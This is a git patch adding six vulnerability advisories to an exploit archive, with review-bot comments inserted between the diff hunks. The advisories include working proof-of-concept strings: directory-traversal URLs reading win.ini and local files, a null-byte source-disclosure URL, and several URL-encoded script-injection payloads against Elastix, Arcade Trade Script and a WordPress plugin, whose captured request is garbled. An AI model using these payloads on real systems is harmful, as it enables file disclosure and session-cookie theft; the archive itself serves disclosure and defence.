From 68d833b397282d32498eae08fd2f660c4aeec931 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 14 Oct 2014 04:50:20 +0000
Subject: [PATCH] Updated 10_14_2014
---
 files.csv | 6 +++
 platforms/multiple/remote/34945.txt | 9 +++++
 platforms/php/webapps/34941.txt | 9 +++++
 platforms/php/webapps/34942.txt | 21 ++++++++++
 platforms/php/webapps/34944.txt | 9 +++++
 platforms/php/webapps/34946.txt | 59 +++++++++++++++++++++++++++++
 platforms/windows/remote/34943.txt | 9 +++++
 7 files changed, 122 insertions(+)
 create mode 100755 platforms/multiple/remote/34945.txt
 create mode 100755 platforms/php/webapps/34941.txt
 create mode 100755 platforms/php/webapps/34942.txt
 create mode 100755 platforms/php/webapps/34944.txt
 create mode 100755 platforms/php/webapps/34946.txt
 create mode 100755 platforms/windows/remote/34943.txt
diff --git a/files.csv b/files.csv
index dcc265309..eb673757a 100755
--- a/files.csv
+++ b/files.csv
@@ -31462,3 +31462,9 @@ id,file,description,date,author,platform,type,port
 34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption Vulnerability",2010-10-28,"Jokaim and nSense",windows,dos,0
 34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 Local File Include and Cross Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0
 34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta 'view.php' Directory Traversal Vulnerability",2009-05-29,MrDoug,php,webapps,0
+34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 'q' Parameter Cross Site Scripting Vulnerability",2009-05-25,SmOk3,php,webapps,0
+34942,platforms/php/webapps/34942.txt,"Elastix 2.0.2 Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"dave b",php,webapps,0
+34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 Directory Traversal Vulnerability",2010-11-01,"John Leitch",windows,remote,0
+34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure Vulnerability",2010-11-01,"Francois Harvey",php,webapps,0
+34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 Directory Traversal Vulnerability",2010-11-01,"John Leitch",multiple,remote,0
+34946,platforms/php/webapps/34946.txt,"cformsII 11.5/ 13.1 Plugin for WordPress 'lib_ajax.php' Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0
diff --git a/platforms/multiple/remote/34945.txt b/platforms/multiple/remote/34945.txt
new file mode 100755
index 000000000..4386af4c2
--- /dev/null
+++ b/platforms/multiple/remote/34945.txt
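Review bot: Several of the added description fields disagree with the advisory files created in this same commit: row 34945 reads `0.7.2 32` where 34945.txt says `0.7.2.32`, row 34943 reads `1.0.0` where 34943.txt says `1.0.0.0`, and row 34946 lists `11.5/ 13.1` while 34946.txt names only 13.1. Row 34944 also leaves out the version (1.7) that its advisory gives. Anyone matching these titles against a software inventory will miss or mis-match on those strings, so I would align each title with the advisory text, for example `"Home File Share Server 0.7.2.32 Directory Traversal Vulnerability"`.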
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44580/info
+
+Home File Share Server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
+
+Home File Share Server 0.7.2.32 is vulnerable; other versions may also be affected.
+
+http://www.example.com/RealFolder/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
\ No newline at end of file
diff --git a/platforms/php/webapps/34941.txt b/platforms/php/webapps/34941.txt
new file mode 100755
index 000000000..54f803efe
--- /dev/null
+++ b/platforms/php/webapps/34941.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44555/info
+
+Arcade Trade Script is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Arcade Trade Script 1.0 beta is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?a=gamelist&q=[XSS]&submit=GO
\ No newline at end of file
diff --git a/platforms/php/webapps/34942.txt b/platforms/php/webapps/34942.txt
new file mode 100755
index 000000000..c4d8d7f4b
--- /dev/null
+++ b/platforms/php/webapps/34942.txt
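Review bot: The header for 34945.txt creates a plain-text advisory with `new file mode 100755`, and the other five .txt files in this commit (34941, 34942, 34943, 34944, 34946) are created with the same mode. Nothing in these files is meant to be executed, so I would commit them as `100644` rather than leave executable files of third-party origin in a checkout. Five of the six files (all but 34946.txt) also end with `\ No newline at end of file`; adding the trailing newline keeps later concatenation and line-based tooling clean.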
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/44565/info
+
+Elastix is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Elastix 2.0.2 is vulnerable; other versions may also be affected.
+
+https://www.example.com/index.php?menu=packages&nombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&submitInstalado=installed&submit_nombre=Search
+
+https://www.example.com/?menu=pbxconfig&display=recordings&Submit=Go&display=recordings&usersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
+
+https://www.example.com/index.php?menu=cdrreport&date_end=28%20Oct%202010&date_start=28%20Oct%202010&field_name=dst&field_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&filter=Filter&status=ALL
+
+https://www.example.com/index.php?menu=asterisk_log&filter=2010-10-28&offset=0&busqueda=&ultima_busqueda=&ultimo_offset=&&busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&filter=2010-10-28&offset=0&show=Show&ultima_busqueda=&ultimo_offset=
+
+https://www.example.com/index.php?menu=summary_by_extension&option_fil=&value_fil=&date_from=28&date_from=28%20Oct%202010&date_to=28%20Oct%202010&option_fil=Ext&show=Show&value_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
+
+https://www.example.com/index.php?menu=grouplist&action=view&id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
+
+https://www.example.com/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34944.txt b/platforms/php/webapps/34944.txt
new file mode 100755
index 000000000..f4b469ee4
--- /dev/null
+++ b/platforms/php/webapps/34944.txt
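Review bot: The advisory text in 34942.txt never names the affected parameters, so a reader has to pick them out of the seven example URLs. I would add one line above the URLs listing them, `Affected parameters: nombre_paquete, usersnum, field_pattern, busqueda, value_fil, id, filter_resource`. That lets whoever is patching an Elastix 2.0.2 install or writing an output-encoding or input-filter rule see the full scope directly.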
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44578/info
+
+SmartOptimizer is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view the source code of files in the context of the server process; this may aid in further attacks.
+
+SmartOptimizer 1.7 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/smartoptimizer/index.php?../index.php%00.js
\ No newline at end of file
diff --git a/platforms/php/webapps/34946.txt b/platforms/php/webapps/34946.txt
new file mode 100755
index 000000000..bc9712020
--- /dev/null
+++ b/platforms/php/webapps/34946.txt
@@ -0,0 +1,59 @@
+source: http://www.securityfocus.com/bid/44587/info
+
+The cformsII plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+cformsII 13.1 is vulnerable; other versions may also be affected.
+
+ Request:
+
+ http://www.example.com/wp-content/plugins/cforms/lib_ajax.php
+
+ POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
+
+ Host: www.example.com
+
+ User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:
+
+ 1.9.2.10) Gecko/20100914 Firefox/3.6.10
+
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+ Accept-Language: en-us,en;q=0.5
+
+ Accept-Encoding: gzip,deflate
+
+ Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+
+ Keep-Alive: 115
+
+ Connection: keep-alive
+
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ Content-Length: 219
+
+ Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do
+
+ %26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce
+
+ %26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do
+
+ %26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;
+
+ c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ;
+
+ comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam
+
+ %40checkpoint.com
+
+ Pragma: no-cache
+
+ Cache-Control: no-cache
+
+ rs=&rst=&rsrnd=1287506634854&rsargs[]=1$#
+
+ $$#$rbranco_nospam@checkpoint.com$#$http://
+
+ www.checkpoint.com$#$
diff --git a/platforms/windows/remote/34943.txt b/platforms/windows/remote/34943.txt
new file mode 100755
index 000000000..61209dd05
--- /dev/null
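Review bot: The captured request in 34946.txt is corrupted and no longer reads as a valid HTTP message: every line is followed by a blank line, the User-Agent and Cookie headers and the POST body are hard-wrapped onto continuation lines, and one cookie name is stored with a space between every character (`c o m m e n t _ a u t h o r _ …`). As stored, the record does not say which `rsargs[]` field is reflected, which limits its use for writing a fix or a detection rule, so I would re-import the text from the source advisory rather than keep this copy. The cookie values and the e-mail address in the capture appear to come from the reporter's own session and could be replaced with placeholders.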
+++ b/platforms/windows/remote/34943.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44569/info
+
+Project Jug is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to read files outside the webroot directory. Information harvested may aid in launching further attacks.
+
+Project Jug 1.0.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/.../.../.../.../.../.../.../.../.../.../windows/win.ini
\ No newline at end of file